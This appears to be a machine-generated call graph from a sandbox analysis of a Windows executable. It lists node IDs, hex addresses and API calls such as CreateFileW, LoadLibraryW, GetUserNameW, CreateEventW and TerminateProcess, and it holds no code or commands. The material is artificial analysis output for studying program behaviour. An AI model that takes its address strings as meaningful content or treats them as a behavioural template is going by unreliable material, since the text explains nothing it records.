60099->60100 60104 5e7d0b 60099->60104 60130 5ef463 DecodePointer 60099->60130 60100->60099 60125 5ef3ce 66 API calls 60100->60125 60126 5ef21f 66 API calls 60100->60126 60127 5ec94c 60100->60127 60132 5ecfc7 66 API calls 60104->60132 60139 5e94c5 60106->60139 60108 5df2a5 60108->60004 60109 591f50 190 API calls 60108->60109 60109->60008 60110->60012 60111->60032 60112->60016 60113->60024 60114->60004 60115->60022 60116->60010 60117->60009 60118->60019 60119->60031 60120->60038 60121->60023 60122->60030 60123->60039 60124->59986 60125->60100 60126->60100 60135 5ec921 GetModuleHandleW 60127->60135 60130->60099 60131->60104 60132->60096 60133->60092 60134->60096 60136 5ec94a ExitProcess 60135->60136 60137 5ec935 GetProcAddress 60135->60137 60137->60136 60138 5ec945 60137->60138 60138->60136 60141 5e94d1 60139->60141 60140 5e94e4 60196 5ecfc7 66 API calls 60140->60196 60141->60140 60143 5e9512 60141->60143 60158 5f43a1 60143->60158 60144 5e94e9 60197 5ed6b5 11 API calls 60144->60197 60147 5e9517 60148 5e951e 60147->60148 60149 5e952b 60147->60149 60198 5ecfc7 66 API calls 60148->60198 60151 5e9553 60149->60151 60152 5e9533 60149->60152 60176 5f40e8 60151->60176 60199 5ecfc7 66 API calls 60152->60199 60154 5e94f4 60154->60108 60159 5f43ad 60158->60159 60201 5f92ea 60159->60201 60161 5f43bb 60162 5f4437 60161->60162 60174 5f4430 60161->60174 60211 5f9228 60161->60211 60239 5ed816 67 API calls 60161->60239 60240 5ed884 LeaveCriticalSection LeaveCriticalSection 60161->60240 60241 5f5ace 66 API calls 60162->60241 60165 5f443e 60166 5f444c InitializeCriticalSectionAndSpinCount 60165->60166 60165->60174 60168 5f447f EnterCriticalSection 60166->60168 60169 5f446c 60166->60169 60167 5f44c0 60167->60147 60168->60174 60242 5e79a7 66 API calls 60169->60242 60173 5f4474 60173->60174 60208 5f44cb 60174->60208 60177 5f410a 60176->60177 60178 5f4125 60177->60178 60190 5f413c 60177->60190 60256 5ecfc7 66 API calls 60178->60256 60179 5f42f1 60182 5f435c 60179->60182 60183 5f434a 60179->60183 60181 5f412a 60257 5ed6b5 11 API calls 60181->60257 60253 606293 60182->60253 60261 5ecfc7 66 API calls 60183->60261 60187 5f434f 60262 5ed6b5 11 API calls 60187->60262 60188 5e955e 60200 5e9579 LeaveCriticalSection LeaveCriticalSection 60188->60200 60190->60179 60190->60183 60190->60190 60258 5ea397 78 API calls 60190->60258 60192 5f42ea 60192->60179 60259 5ea397 78 API calls 60192->60259 60194 5f4309 60194->60179 60260 5ea397 78 API calls 60194->60260 60196->60144 60197->60154 60198->60154 60199->60154 60200->60154 60202 5f92ff 60201->60202 60203 5f9312 EnterCriticalSection 60201->60203 60204 5f9228 65 API calls 60202->60204 60203->60161 60205 5f9305 60204->60205 60205->60203 60243 5ecc6b 66 API calls 60205->60243 60244 5f91f9 LeaveCriticalSection 60208->60244 60210 5f44d2 60210->60167 60212 5f9234 60211->60212 60213 5f925c 60212->60213 60214 5f9244 60212->60214 60215 5f925a 60213->60215 60224 5f926a 60213->60224 60245 5ef3ce 66 API calls 60214->60245 60215->60213 60247 5f5ace 66 API calls 60215->60247 60218 5f9249 60246 5ef21f 66 API calls 60218->60246 60219 5f9275 60222 5f927c 60219->60222 60223 5f928b 60219->60223 60221 5f9250 60225 5ec94c 3 API calls 60221->60225 60248 5ecfc7 66 API calls 60222->60248 60227 5f92ea 65 API calls 60223->60227 60224->60161 60225->60215 60229 5f9292 60227->60229 60228 5f9281 60228->60224 60230 5f929a InitializeCriticalSectionAndSpinCount 60229->60230 60231 5f92c5 60229->60231 60233 5f92aa 60230->60233 60234 5f92b6 60230->60234 60251 5e79a7 66 API calls 60231->60251 60249 5e79a7 66 API calls 60233->60249 60252 5f92e1 LeaveCriticalSection 60234->60252 60236 5f92b0 60250 5ecfc7 66 API calls 60236->60250 60239->60161 60240->60161 60241->60165 60242->60173 60244->60210 60245->60218 60246->60221 60247->60219 60248->60228 60249->60236 60250->60234 60251->60234 60252->60228 60263 60619d 60253->60263 60255 6062ae 60255->60188 60256->60181 60257->60188 60258->60192 60259->60194 60260->60179 60261->60187 60262->60188 60264 6061a9 60263->60264 60265 6061bc 60264->60265 60268 6061f2 60264->60268 60383 5ecfc7 66 API calls 60265->60383 60267 6061c1 60384 5ed6b5 11 API calls 60267->60384 60274 6059ba 60268->60274 60271 60620c 60385 606233 LeaveCriticalSection 60271->60385 60273 6061cb 60273->60255 60275 6059e1 60274->60275 60386 5e803d 60275->60386 60278 6060ee 60281 606110 60278->60281 60282 606125 60278->60282 60279 605a3c 60411 5ecfda 66 API calls 60279->60411 60444 5ecfc7 66 API calls 60281->60444 60284 6059ba 120 API calls 60282->60284 60283 605a41 60412 5ecfc7 66 API calls 60283->60412 60288 60613f 60284->60288 60286 6059fd 60286->60279 60289 605a97 60286->60289 60382 605c6c 60286->60382 60446 606163 LeaveCriticalSection 60288->60446 60294 605b1e 60289->60294 60300 605af1 60289->60300 60290 606115 60445 5ed6b5 11 API calls 60290->60445 60291 605a4b 60413 5ed6b5 11 API calls 60291->60413 60414 5ecfda 66 API calls 60294->60414 60296 606151 60302 606120 60296->60302 60447 5ecfc7 66 API calls 60296->60447 60298 605b23 60415 5ecfc7 66 API calls 60298->60415 60393 5ef6c1 60300->60393 60302->60271 60303 605b2d 60416 5ed6b5 11 API calls 60303->60416 60306 605a55 60306->60271 60307 605baf 60308 605bb8 60307->60308 60309 605bd9 CreateFileW 60307->60309 60417 5ecfda 66 API calls 60308->60417 60310 605c76 GetFileType 60309->60310 60311 605c06 60309->60311 60315 605c83 GetLastError 60310->60315 60316 605cc7 60310->60316 60313 605c14 60311->60313 60314 605c3f GetLastError 60311->60314 60313->60314 60318 605c1a CreateFileW 60313->60318 60420 5ecfed 66 API calls 60314->60420 60422 5ecfed 66 API calls 60315->60422 60424 5ef48b 67 API calls 60316->60424 60317 605bbd 60418 5ecfc7 66 API calls 60317->60418 60318->60310 60318->60314 60322 605cac CloseHandle 60325 605cba 60322->60325 60330 605c66 60322->60330 60323 605bc7 60419 5ecfc7 66 API calls 60323->60419 60423 5ecfc7 66 API calls 60325->60423 60328 605ce5 60331 605d3b 60328->60331 60332 605dab 60328->60332 60333 605fda 60328->60333 60421 5ecfc7 66 API calls 60330->60421 60425 5ee834 68 API calls 60331->60425 60332->60333 60345 605f05 60332->60345 60355 605e55 60332->60355 60334 605efc 60333->60334 60333->60382 60334->60333 60336 606064 CloseHandle CreateFileW 60334->60336 60334->60382 60338 606091 GetLastError 60336->60338 60336->60382 60337 605d45 60339 605d67 60337->60339 60340 605d4e 60337->60340 60441 5ecfed 66 API calls 60338->60441 60428 5eead7 76 API calls 60339->60428 60426 5ecfda 66 API calls 60340->60426 60344 605d53 60344->60332 60349 605d5b 60344->60349 60345->60333 60357 605f22 60345->60357 60359 605e79 60345->60359 60346 605d78 60351 605d92 60346->60351 60429 60c0dc 100 API calls 60346->60429 60347 60609d 60442 5ef50c 67 API calls 60347->60442 60427 5f1ce8 69 API calls 60349->60427 60350 605ec0 60350->60349 60433 5eead7 76 API calls 60350->60433 60351->60349 60430 5ee834 68 API calls 60351->60430 60355->60333 60355->60350 60355->60359 60360 605ea4 60355->60360 60434 5fa89a 68 API calls 60357->60434 60359->60333 60359->60349 60440 5ee57a 97 API calls 60359->60440 60431 5fa89a 68 API calls 60360->60431 60361 605f2d 60361->60359 60368 605f38 60361->60368 60363 605f63 60436 5f1ce8 69 API calls 60363->60436 60364 605f7d 60366 605f9f 60364->60366 60370 605f84 60364->60370 60365 605eda 60365->60334 60365->60349 60365->60363 60365->60364 60365->60366 60439 5ee834 68 API calls 60366->60439 60435 5fa89a 68 API calls 60368->60435 60438 5ee834 68 API calls 60370->60438 60371 605eaf 60371->60359 60376 605eb6 60371->60376 60374 605f6a 60437 5ecfc7 66 API calls 60374->60437 60432 5fa89a 68 API calls 60376->60432 60377 605f42 60377->60333 60377->60349 60380 605f8e 60380->60334 60380->60349 60443 5ed649 10 API calls 60382->60443 60383->60267 60384->60273 60385->60273 60387 5e805e 60386->60387 60388 5e8049 60386->60388 60387->60286 60448 5ecfc7 66 API calls 60388->60448 60390 5e804e 60449 5ed6b5 11 API calls 60390->60449 60392 5e8059 60392->60286 60394 5ef6cd 60393->60394 60395 5f9228 66 API calls 60394->60395 60396 5ef6dd 60395->60396 60397 5f92ea 66 API calls 60396->60397 60398 5ef6e2 60396->60398 60408 5ef6f1 60397->60408 60398->60307 60399 5ef833 60458 5ef851 LeaveCriticalSection 60399->60458 60401 5ef7c9 60451 5f5b13 60401->60451 60403 5f92ea 66 API calls 60403->60408 60404 5ef771 EnterCriticalSection 60406 5ef781 LeaveCriticalSection 60404->60406 60404->60408 60406->60408 60407 5ef747 InitializeCriticalSectionAndSpinCount 60407->60408 60408->60399 60408->60401 60408->60403 60408->60404 60408->60407 60450 5ef793 LeaveCriticalSection 60408->60450 60411->60283 60412->60291 60413->60306 60414->60298 60415->60303 60416->60306 60417->60317 60418->60323 60419->60306 60420->60330 60421->60382 60422->60322 60423->60330 60424->60328 60425->60337 60426->60344 60427->60330 60428->60346 60429->60351 60430->60344 60431->60371 60432->60350 60433->60365 60434->60361 60435->60377 60436->60374 60437->60382 60438->60380 60439->60377 60440->60359 60441->60347 60442->60382 60443->60278 60444->60290 60445->60302 60446->60296 60447->60302 60448->60390 60449->60392 60450->60408 60454 5f5b1c 60451->60454 60452 5f83dc 65 API calls 60452->60454 60453 5ef7d2 60453->60399 60457 5ef5fb 68 API calls 60453->60457 60454->60452 60454->60453 60455 5f5b3a Sleep 60454->60455 60456 5f5b4f 60455->60456 60456->60453 60456->60454 60457->60399 60458->60398 60462 5d6e10 60459->60462 60461 5da5be 60461->60047 60463 5d6e32 60462->60463 60464 5d7602 60462->60464 60465 5d6f1f GetModuleFileNameW 60463->60465 60472 5d6e67 60463->60472 60466 5d769c 60464->60466 60467 5d76af 60464->60467 60465->60472 60468 5e82b3 5 API calls 60466->60468 60469 5e82b3 5 API calls 60467->60469 60470 5d76ab 60468->60470 60471 5d76c0 60469->60471 60470->60461 60471->60461 60472->60472 60473 5e9583 136 API calls 60472->60473 60474 5d6f71 60473->60474 60474->60464 60492 5d2110 118 API calls 60474->60492 60476 5d6f98 60493 5d1e20 82 API calls 60476->60493 60478 5d6fc0 60489 5d750d 60478->60489 60494 5e83d7 67 API calls 60478->60494 60481 5d6fd4 60481->60489 60495 5d6c20 68 API calls 60481->60495 60483 5d7002 60496 5d1e20 82 API calls 60483->60496 60485 5d7015 60485->60489 60497 5d1e20 82 API calls 60485->60497 60489->60489 60500 5e8c09 102 API calls 60489->60500 60490 5d7044 60490->60489 60491 5e9116 78 API calls 60490->60491 60498 5d6c20 68 API calls 60490->60498 60499 5d1e20 82 API calls 60490->60499 60491->60490 60492->60476 60493->60478 60494->60481 60495->60483 60496->60485 60497->60490 60498->60490 60499->60490 60500->60464 60501->60057 60502->59973 60503 617f20 60504 5b97d0 188 API calls 60503->60504 60505 617f2d 60504->60505 60506 617f70 60505->60506 60507 617f34 60505->60507 60516 5e85a6 60506->60516 60508 5e9c97 76 API calls 60507->60508 60510 617f69 60508->60510 60513 617f98 LoadLibraryW 60522 5e9c97 60513->60522 60525 5e8548 60516->60525 60519 5e91a1 60520 5e91ca 60519->60520 60521 5e91d6 RaiseException 60519->60521 60520->60521 60521->60513 60532 5e9c5b 76 API calls 60522->60532 60524 5e9ca4 60526 5e8556 60525->60526 60527 5e857b 60525->60527 60528 5e7ca4 66 API calls 60526->60528 60527->60519 60529 5e8568 60528->60529 60529->60527 60531 5f0a68 66 API calls 60529->60531 60531->60527 60532->60524 60533 617f00 60538 5ca250 60533->60538 60536 5e9c97 76 API calls 60537 617f14 60536->60537 60539 5ca27e 60538->60539 60540 5ca288 GetModuleFileNameW 60539->60540 60556 5eab18 60540->60556 60542 5ca2ab 60543 5ca2e0 GetCurrentProcessId wsprintfW CreateEventW 60542->60543 60544 5ca31a GetLastError 60543->60544 60545 5ca473 60543->60545 60544->60545 60546 5ca32b LocalAlloc InitializeSecurityDescriptor SetSecurityDescriptorDacl 60544->60546 60547 5e82b3 5 API calls 60545->60547 60548 5ca370 wsprintfW CreateEventW 60546->60548 60549 5ca482 60547->60549 60550 5ca3cb 60548->60550 60551 5ca3a5 GetLastError 60548->60551 60549->60536 60550->60548 60553 5ca3d9 60550->60553 60554 5ca3db wsprintfW CreateEventW 60550->60554 60551->60550 60552 5ca3b2 CloseHandle 60551->60552 60552->60550 60555 5ca40b 6 API calls 60553->60555 60554->60555 60555->60545 60568 5c5a70 60555->60568 60557 5eab6c 60556->60557 60558 5eab26 60556->60558 60567 5eaab4 77 API calls 60557->60567 60562 5eab41 60558->60562 60565 5ecfc7 66 API calls 60558->60565 60561 5eab32 60566 5ed6b5 11 API calls 60561->60566 60562->60542 60564 5eab3d 60564->60542 60565->60561 60566->60564 60567->60562 60569 5c5a83 60568->60569 60588 5c5120 60569->60588 60572 5c5a93 WaitForMultipleObjects 60573 5c5adc 60572->60573 60574 5c5b4a 60572->60574 60576 5c5ae0 WaitForSingleObject 60573->60576 60575 5c5b95 60574->60575 60577 5c5b82 60574->60577 60578 5c5b53 Sleep GetCurrentProcess TerminateProcess 60574->60578 60579 5c5af6 60576->60579 60580 5c5b02 ResetEvent 60576->60580 60577->60575 60582 5c5b87 60577->60582 60579->60580 60604 5c55b0 236 API calls 60580->60604 60605 5c55b0 236 API calls 60582->60605 60583 5c5b19 60585 5c5b29 SetEvent WaitForMultipleObjects 60583->60585 60585->60576 60587 5c5b45 60585->60587 60586 5c5b92 60586->60575 60587->60574 60589 5c513c GetCurrentProcess 60588->60589 60590 5c5160 60588->60590 60589->60590 60591 5c514e GetModuleFileNameW 60589->60591 60592 5c522f 60590->60592 60595 5b97d0 188 API calls 60590->60595 60599 5c518e 60590->60599 60591->60590 60593 5e82b3 5 API calls 60592->60593 60594 5c5249 60593->60594 60594->60572 60596 5c5180 60595->60596 60596->60599 60606 5c4760 GetModuleFileNameW 60596->60606 60597 5c51f8 60597->60592 60601 5c521e 60597->60601 60598 5c51c7 WideCharToMultiByte 60598->60597 60599->60597 60599->60598 60602 5e82b3 5 API calls 60601->60602 60603 5c522b 60602->60603 60603->60572 60604->60583 60605->60586 60607 5c47dd 60606->60607 60608 5c47a0 60606->60608 60609 5c47fd GetModuleHandleW GetProcAddress 60607->60609 60610 5c47e3 LoadLibraryW 60607->60610 60608->60607 60617 5c47cf LoadLibraryW 60608->60617 60611 5c481d 60609->60611 60612 5c482b GetProcAddress GetProcAddress GetProcAddress GetProcAddress 60609->60612 60610->60609 60613 5c47f2 LoadLibraryW 60610->60613 60614 5c4857 11 API calls 60611->60614 60612->60614 60613->60609 60615 5e82b3 5 API calls 60614->60615 60616 5c48df 60615->60616 60616->60599 60617->60607 60618 618300 60619 618310 60618->60619 60620 618309 FreeLibrary 60618->60620 60620->60619 60621 5ed366 60659 5edcc0 60621->60659 60623 5ed372 GetStartupInfoW 60624 5ed386 HeapSetInformation 60623->60624 60626 5ed391 60623->60626 60624->60626 60660 5ee97d HeapCreate 60626->60660 60627 5ed3df 60628 5ed3ea 60627->60628 60819 5ed2f6 66 API calls 60627->60819 60661 5f2d4e GetModuleHandleW 60628->60661 60631 5ed3f0 60632 5ed3fb 60631->60632 60820 5ed2f6 66 API calls 60631->60820 60686 5eda1b GetStartupInfoW 60632->60686 60636 5ed415 GetCommandLineW 60699 5fa6ad GetEnvironmentStringsW 60636->60699 60640 5ed425 60706 5fa5ff GetModuleFileNameW 60640->60706 60643 5ed43a 60712 5fa3be 60643->60712 60646 5ed440 60647 5ed44b 60646->60647 60823 5ecc6b 66 API calls 60646->60823 60726 5eca4a 60647->60726 60650 5ed453 60652 5ed45e 60650->60652 60824 5ecc6b 66 API calls 60650->60824 60732 5dddd0 SetUnhandledExceptionFilter GetModuleFileNameW 60652->60732 60654 5ed480 60655 5ed48e 60654->60655 60816 5ecc21 60654->60816 60825 5ecc4d 66 API calls 60655->60825 60658 5ed493 60659->60623 60660->60627 60662 5f2d6b GetProcAddress GetProcAddress GetProcAddress GetProcAddress 60661->60662 60663 5f2d62 60661->60663 60664 5f2db5 TlsAlloc 60662->60664 60826 5f2a21 70 API calls 60663->60826 60668 5f2ec4 60664->60668 60669 5f2e03 TlsSetValue 60664->60669 60667 5f2d67 60667->60631 60668->60631 60669->60668 60670 5f2e14 60669->60670 60827 5ec976 EncodePointer EncodePointer 60670->60827 60672 5f2e19 EncodePointer EncodePointer EncodePointer EncodePointer 60828 5f9158 InitializeCriticalSectionAndSpinCount 60672->60828 60674 5f2e58 60675 5f2ebf 60674->60675 60676 5f2e5c DecodePointer 60674->60676 60830 5f2a21 70 API calls 60675->60830 60678 5f2e71 60676->60678 60678->60675 60679 5f5b13 66 API calls 60678->60679 60680 5f2e87 60679->60680 60680->60675 60681 5f2e8f DecodePointer 60680->60681 60682 5f2ea0 60681->60682 60682->60675 60683 5f2ea4 60682->60683 60829 5f2a5e 66 API calls 60683->60829 60685 5f2eac GetCurrentThreadId 60685->60668 60687 5f5b13 66 API calls 60686->60687 60698 5eda39 60687->60698 60688 5edbe4 GetStdHandle 60694 5edbae 60688->60694 60689 5f5b13 66 API calls 60689->60698 60690 5edc48 SetHandleCount 60693 5ed409 60690->60693 60691 5edbf6 GetFileType 60691->60694 60692 5edb2e 60692->60694 60695 5edb5a GetFileType 60692->60695 60696 5edb65 InitializeCriticalSectionAndSpinCount 60692->60696 60693->60636 60821 5ecc6b 66 API calls 60693->60821 60694->60688 60694->60690 60694->60691 60697 5edc1c InitializeCriticalSectionAndSpinCount 60694->60697 60695->60692 60695->60696 60696->60692 60696->60693 60697->60693 60697->60694 60698->60689 60698->60692 60698->60693 60698->60694 60698->60698 60700 5fa6be 60699->60700 60701 5fa6c2 60699->60701 60700->60640 60831 5f5ace 66 API calls 60701->60831 60704 5fa6e4 60705 5fa6eb FreeEnvironmentStringsW 60704->60705 60705->60640 60707 5fa634 60706->60707 60708 5ed42f 60707->60708 60709 5fa671 60707->60709 60708->60643 60822 5ecc6b 66 API calls 60708->60822 60832 5f5ace 66 API calls 60709->60832 60711 5fa677 60711->60708 60714 5fa3d6 60712->60714 60717 5fa3ce 60712->60717 60713 5f5b13 66 API calls 60720 5fa3fa 60713->60720 60714->60713 60715 5fa450 60834 5e79a7 66 API calls 60715->60834 60717->60646 60718 5f5b13 66 API calls 60718->60720 60719 5fa476 60835 5e79a7 66 API calls 60719->60835 60720->60715 60720->60717 60720->60718 60720->60719 60723 5fa48d 60720->60723 60833 5e847c 66 API calls 60720->60833 60836 5ed649 10 API calls 60723->60836 60725 5fa499 60725->60646 60728 5eca58 60726->60728 60837 5f8261 60728->60837 60729 5eca76 60730 5e9c97 76 API calls 60729->60730 60731 5eca97 60729->60731 60730->60731 60731->60650 60733 5dde3a GetLastError 60732->60733 60734 5dde40 60732->60734 60733->60734 60840 5d6080 GetShortPathNameW 60734->60840 60736 5dde4d 60737 5df030 210 API calls 60736->60737 60738 5dde69 60737->60738 60739 5df030 210 API calls 60738->60739 60740 5dde78 GetUserNameW 60739->60740 60741 5aff40 9 API calls 60740->60741 60742 5dde94 60741->60742 60743 5df030 210 API calls 60742->60743 60744 5ddea6 60743->60744 60869 5d5490 LoadLibraryW 60744->60869 60746 5ddeab 60882 5e9cae 60746->60882 60748 5ddecb 60749 5df030 210 API calls 60748->60749 60750 5ddf1c LoadStringW 60749->60750 60751 5da5b0 149 API calls 60750->60751 60752 5ddf44 wsprintfW 60751->60752 60753 5da5b0 149 API calls 60752->60753 60754 5ddf5e 60753->60754 60755 5da5b0 149 API calls 60754->60755 60756 5ddf6a 60755->60756 60757 5da5b0 149 API calls 60756->60757 60758 5ddf76 60757->60758 60891 5e9116 60758->60891 60761 5eab18 77 API calls 60762 5de032 60761->60762 60763 5eab18 77 API calls 60762->60763 60764 5de077 60763->60764 60899 5df6d0 GetVersionExW 60764->60899 60766 5de07f 60767 5de0dd GetModuleFileNameW 60766->60767 60768 5de087 GetPrivateProfileStringW lstrcmpiW 60766->60768 60770 5de0fc 60767->60770 60771 5de0f6 GetLastError 60767->60771 60768->60767 60769 5de0d3 60768->60769 60769->60767 60772 5df030 210 API calls 60770->60772 60771->60770 60773 5de10d 60772->60773 60774 5df030 210 API calls 60773->60774 60775 5de11c 60774->60775 60776 5d6080 222 API calls 60775->60776 60777 5de129 60776->60777 60921 5ed09c DeleteFileW 60777->60921 60779 5de15a 60927 5db1f0 60779->60927 60781 5de189 60782 5de663 60781->60782 60933 5ea558 85 API calls 60781->60933 60784 5de705 60782->60784 60786 5de678 GetCurrentDirectoryW 60782->60786 60792 5de688 60782->60792 60785 5df030 210 API calls 60784->60785 60787 5dedc7 60785->60787 60786->60792 60788 5dede7 DestroyWindow 60787->60788 60789 5dedd3 PostMessageW 60787->60789 60790 5def27 60788->60790 60791 5dee02 60788->60791 60789->60788 60794 5e82b3 5 API calls 60790->60794 60798 5e9583 136 API calls 60791->60798 60934 5d78f0 6 API calls 60792->60934 60796 5def34 60794->60796 60795 5de6ce 60797 5df030 210 API calls 60795->60797 60796->60654 60799 5de6e3 60797->60799 60800 5dee2e 60798->60800 60799->60784 60802 5de6f2 60799->60802 60801 5dee48 60800->60801 60936 5e73d1 99 API calls 60800->60936 60804 5dee6e 60801->60804 60805 5dee53 Sleep 60801->60805 60935 5d4050 138 API calls 60802->60935 60809 5df030 210 API calls 60804->60809 60808 5df030 210 API calls 60805->60808 60806 5dee42 60937 5e8c09 102 API calls 60806->60937 60811 5dee68 60808->60811 60812 5dee7b 60809->60812 60938 5d4420 221 API calls 60811->60938 60814 5e82b3 5 API calls 60812->60814 60815 5dee8d 60814->60815 60815->60654 61031 5ecae1 60816->61031 60818 5ecc32 60818->60655 60819->60628 60820->60632 60825->60658 60826->60667 60827->60672 60828->60674 60829->60685 60830->60668 60831->60704 60832->60711 60833->60720 60834->60717 60835->60717 60836->60725 60838 5f8267 EncodePointer 60837->60838 60838->60838 60839 5f8281 60838->60839 60839->60729 60841 5d60af GetLastError 60840->60841 60842 5d60b7 60840->60842 60841->60842 60843 5d613c 60842->60843 60844 5d60f7 wsprintfW MessageBoxW 60842->60844 60939 5d5690 60843->60939 60845 5e82b3 5 API calls 60844->60845 60847 5d6138 60845->60847 60847->60736 60848 5d614b 60849 5df030 210 API calls 60848->60849 60850 5d6163 60849->60850 60851 5df030 210 API calls 60850->60851 60852 5d6172 60851->60852 60854 5df030 210 API calls 60852->60854 60856 5d61ca SetCurrentDirectoryW 60852->60856 60854->60856 60855 5d623c 60951 5df5b0 60855->60951 60856->60855 60858 5d6246 60856->60858 60858->60858 60955 5ec0c4 60858->60955 60860 5e82b3 5 API calls 60862 5d6399 60860->60862 60862->60736 60863 5ec0c4 68 API calls 60865 5d62c1 60863->60865 60864 5d62c8 60864->60860 60865->60864 60866 5ec0c4 68 API calls 60865->60866 60867 5d631b 60866->60867 60867->60864 60868 5ec0c4 68 API calls 60867->60868 60868->60864 60870 5d54d8 GetProcAddress 60869->60870 60871 5d55b1 60869->60871 60870->60871 60873 5d54f1 GetProcAddress 60870->60873 60872 5e82b3 5 API calls 60871->60872 60874 5d55be 60872->60874 60873->60871 60875 5d5507 GetUserNameW 60873->60875 60874->60746 60878 5d5541 60875->60878 60876 5d5580 60877 5d55aa FreeLibrary 60876->60877 60877->60871 60878->60876 60878->60877 60879 5d5582 60878->60879 60880 5df030 210 API calls 60878->60880 60984 5b0c30 187 API calls 60879->60984 60880->60878 60883 5e9cbb 60882->60883 60884 5e9cbf 60882->60884 60883->60748 60985 5eb552 66 API calls 60884->60985 60886 5e9cd4 60886->60883 60986 5e847c 66 API calls 60886->60986 60888 5e9ce7 60888->60883 60889 5e9cf2 60888->60889 60987 5ed649 10 API calls 60889->60987 60892 5e918e 60891->60892 60893 5e9125 60891->60893 60990 5e9013 78 API calls 60892->60990 60898 5ddf86 60893->60898 60988 5ecfc7 66 API calls 60893->60988 60896 5e9131 60989 5ed6b5 11 API calls 60896->60989 60898->60761 60900 5df718 LoadLibraryW 60899->60900 60902 5df7b8 GetProcAddress 60900->60902 60903 5df7f3 60900->60903 60906 5df7ea FreeLibrary 60902->60906 60907 5df7c6 GetCurrentProcess 60902->60907 60904 5df865 60903->60904 60905 5df7fb GetModuleHandleW GetProcAddress 60903->60905 60910 5e82b3 5 API calls 60904->60910 60908 5df828 60905->60908 60909 5df812 GetNativeSystemInfo 60905->60909 60906->60903 60912 5df7d4 60907->60912 60915 5df030 210 API calls 60908->60915 60909->60908 60911 5df839 60909->60911 60913 5df875 60910->60913 60914 5df030 210 API calls 60911->60914 60912->60906 60917 5df030 210 API calls 60912->60917 60913->60766 60916 5df847 60914->60916 60915->60904 60918 5e82b3 5 API calls 60916->60918 60919 5df7e7 60917->60919 60920 5df857 60918->60920 60919->60906 60920->60766 60922 5ed0ae GetLastError 60921->60922 60923 5ed0b6 60921->60923 60922->60923 60924 5ed0c8 60923->60924 60991 5ecfed 66 API calls 60923->60991 60924->60779 60926 5ed0c2 60926->60779 60930 5db20c 60927->60930 60932 5db244 60927->60932 60928 5e82b3 5 API calls 60929 5db264 60928->60929 60929->60781 60992 5d9ef0 60930->60992 60932->60928 60933->60781 60934->60795 60935->60784 60936->60806 60937->60801 60938->60804 60940 5d569d 60939->60940 60941 5d5843 60940->60941 60942 5d56da GetModuleHandleW GetProcAddress 60940->60942 60944 5e82b3 5 API calls 60941->60944 60943 5d56f5 GetLongPathNameW 60942->60943 60948 5d570e 60942->60948 60945 5e82b3 5 API calls 60943->60945 60946 5d58a9 60944->60946 60947 5d570a 60945->60947 60946->60848 60947->60848 60948->60941 60950 5d574b 60948->60950 60950->60941 60950->60950 60958 5d55d0 7 API calls 60950->60958 60952 5df5c0 60951->60952 60952->60952 60953 5df030 210 API calls 60952->60953 60954 5df5d6 60953->60954 60954->60858 60959 5ec045 60955->60959 60958->60950 60960 5ec06c 60959->60960 60961 5ec052 60959->60961 60960->60961 60963 5ec075 GetFileAttributesW 60960->60963 60977 5ecfda 66 API calls 60961->60977 60965 5ec083 GetLastError 60963->60965 60968 5ec099 60963->60968 60964 5ec057 60978 5ecfc7 66 API calls 60964->60978 60980 5ecfed 66 API calls 60965->60980 60970 5d628e 60968->60970 60982 5ecfda 66 API calls 60968->60982 60969 5ec05e 60979 5ed6b5 11 API calls 60969->60979 60970->60863 60970->60864 60971 5ec08f 60981 5ecfc7 66 API calls 60971->60981 60975 5ec0ac 60983 5ecfc7 66 API calls 60975->60983 60977->60964 60978->60969 60979->60970 60980->60971 60981->60970 60982->60975 60983->60971 60984->60876 60985->60886 60986->60888 60987->60883 60988->60896 60989->60898 60990->60898 60991->60926 60993 5d9f31 60992->60993 60994 5e9583 136 API calls 60993->60994 60995 5d9f95 60994->60995 60996 5d9fb8 60995->60996 60997 5d9fa2 60995->60997 61022 5d2110 118 API calls 60996->61022 60998 5e82b3 5 API calls 60997->60998 61000 5d9fb4 60998->61000 61000->60932 61001 5d9fc5 61023 5d1e20 82 API calls 61001->61023 61003 5da000 61015 5da0f6 61003->61015 61024 5e83d7 67 API calls 61003->61024 61006 5da27b 61007 5e82b3 5 API calls 61006->61007 61008 5da28d 61007->61008 61008->60932 61009 5da014 61009->61015 61025 5d6c20 68 API calls 61009->61025 61011 5da0db 61026 5d1e20 82 API calls 61011->61026 61013 5da0ee 61013->61015 61027 5d1e20 82 API calls 61013->61027 61030 5e8c09 102 API calls 61015->61030 61018 5da12b 61018->61015 61019 5d7710 67 API calls 61018->61019 61020 5d2000 WideCharToMultiByte 61018->61020 61021 5e8406 67 API calls 61018->61021 61028 5d6c20 68 API calls 61018->61028 61029 5d1e20 82 API calls 61018->61029 61019->61018 61020->61018 61021->61018 61022->61001 61023->61003 61024->61009 61025->61011 61026->61013 61027->61018 61028->61018 61029->61018 61030->61006 61032 5ecaed 61031->61032 61033 5f92ea 61 API calls 61032->61033 61034 5ecaf4 61033->61034 61036 5ecb1f DecodePointer 61034->61036 61039 5ecb9e 61034->61039 61038 5ecb36 DecodePointer 61036->61038 61036->61039 61050 5ecb49 61038->61050 61052 5ecc0c 61039->61052 61040 5ecc1b 61040->60818 61042 5ecc03 61044 5ec94c 3 API calls 61042->61044 61045 5ecc0c 61044->61045 61046 5ecc19 61045->61046 61059 5f91f9 LeaveCriticalSection 61045->61059 61046->60818 61047 5ecb60 DecodePointer 61058 5f299e EncodePointer 61047->61058 61050->61039 61050->61047 61051 5ecb6f DecodePointer DecodePointer 61050->61051 61057 5f299e EncodePointer 61050->61057 61051->61050 61053 5ecbec 61052->61053 61054 5ecc12 61052->61054 61053->61040 61056 5f91f9 LeaveCriticalSection 61053->61056 61060 5f91f9 LeaveCriticalSection 61054->61060 61056->61042 61057->61050 61058->61050 61059->61046 61060->61053 61061 5c5bb0 61062 5c5bbd 61061->61062 61063 5c5c00 61061->61063 61064 5c5beb 61062->61064 61065 5c5bc2 SetEvent 61062->61065 61068 5c5c0f CloseHandle 61063->61068 61069 5c5c12 61063->61069 61064->61063 61067 5c5bf5 CloseHandle 61064->61067 61066 5c5bd2 61065->61066 61066->61064 61070 5c5bdb WaitForSingleObject 61066->61070 61067->61063 61068->61069 61071 5c5c18 CloseHandle 61069->61071 61072 5c5c1b 61069->61072 61070->61064 61070->61066 61071->61072 61073 5de492 61074 5de49b 61073->61074 61075 5d6080 222 API calls 61074->61075 61076 5de581 61075->61076 61077 5df030 210 API calls 61076->61077 61078 5de587 61077->61078 61079 5df030 210 API calls 61078->61079 61080 5de598 61079->61080

                                                                                          Executed Functions

